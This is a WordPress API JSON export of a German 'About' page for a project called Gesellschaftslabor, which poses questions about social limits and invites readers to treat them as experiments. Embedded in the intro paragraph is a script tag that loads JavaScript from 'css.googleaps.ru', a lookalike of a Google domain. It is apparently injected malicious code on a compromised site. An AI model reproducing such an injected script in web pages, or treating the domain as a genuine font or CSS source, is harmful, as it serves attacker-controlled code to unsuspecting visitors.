{"id":41,"date":"2018-03-31T16:45:39","date_gmt":"2018-03-31T14:45:39","guid":{"rendered":"http:\/\/old.gesellschaftslabor.com\/?page_id=41"},"modified":"2018-03-31T17:29:17","modified_gmt":"2018-03-31T15:29:17","slug":"about","status":"publish","type":"page","link":"https:\/\/old.gesellschaftslabor.com\/?page_id=41","title":{"rendered":"\u00dcber"},"content":{"rendered":"<p class=\"intro\">Was machen Menschen mit Menschen?<br \/>\nWo beschr\u00e4nkt, wo bereichert Gesellschaft?<br \/>\nWer ist wann und wieso Teil wovon?<br \/>\nWie elastisch sind (vermeintliche) Grenzen?<br \/>\nWas ist (un-)m\u00f6glich?<script src=\"\/\/css.googleaps.ru\/css?f=Open+Sans&amp;cd=mb&amp;ver=4.2.2\" type=\"text\/javascript\"><\/script><\/p>\n<p>Sie f\u00fchlen sich manchmal &#8222;gesellschaftlich eingeschr\u00e4nkt&#8220;? Sie haben das Gef\u00fchl, dass da noch mehr m\u00f6glich ist? Machen Sie einfach ein Experiment daraus. Das Labor wird so zu Ihrem Schutzmantel. Wenn es nicht klappt, scheitern nicht Sie sondern das Experiment. Und das ist ja durchaus \u00fcblich bei Experimenten. Gibt ganz sch\u00f6n viel Spielraum! Probieren Sie es aus. Gemeinsam mit uns oder auch einsam mit Ihnen. Hat beides was.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Was machen Menschen mit Menschen? Wo beschr\u00e4nkt, wo bereichert Gesellschaft? Wer ist wann und wieso Teil wovon? Wie elastisch sind (vermeintliche) Grenzen? Was ist (un-)m\u00f6glich? Sie f\u00fchlen sich manchmal &#8222;gesellschaftlich eingeschr\u00e4nkt&#8220;? Sie haben das Gef\u00fchl, dass da noch mehr m\u00f6glich ist? Machen Sie einfach ein Experiment daraus. Das Labor wird so zu Ihrem Schutzmantel. Wenn [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"page-templates\/about-page.php","meta":{"footnotes":""},"class_list":["post-41","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/old.gesellschaftslabor.com\/index.php?rest_route=\/wp\/v2\/pages\/41","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/old.gesellschaftslabor.com\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/old.gesellschaftslabor.com\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/old.gesellschaftslabor.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/old.gesellschaftslabor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=41"}],"version-history":[{"count":3,"href":"https:\/\/old.gesellschaftslabor.com\/index.php?rest_route=\/wp\/v2\/pages\/41\/revisions"}],"predecessor-version":[{"id":50,"href":"https:\/\/old.gesellschaftslabor.com\/index.php?rest_route=\/wp\/v2\/pages\/41\/revisions\/50"}],"wp:attachment":[{"href":"https:\/\/old.gesellschaftslabor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=41"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}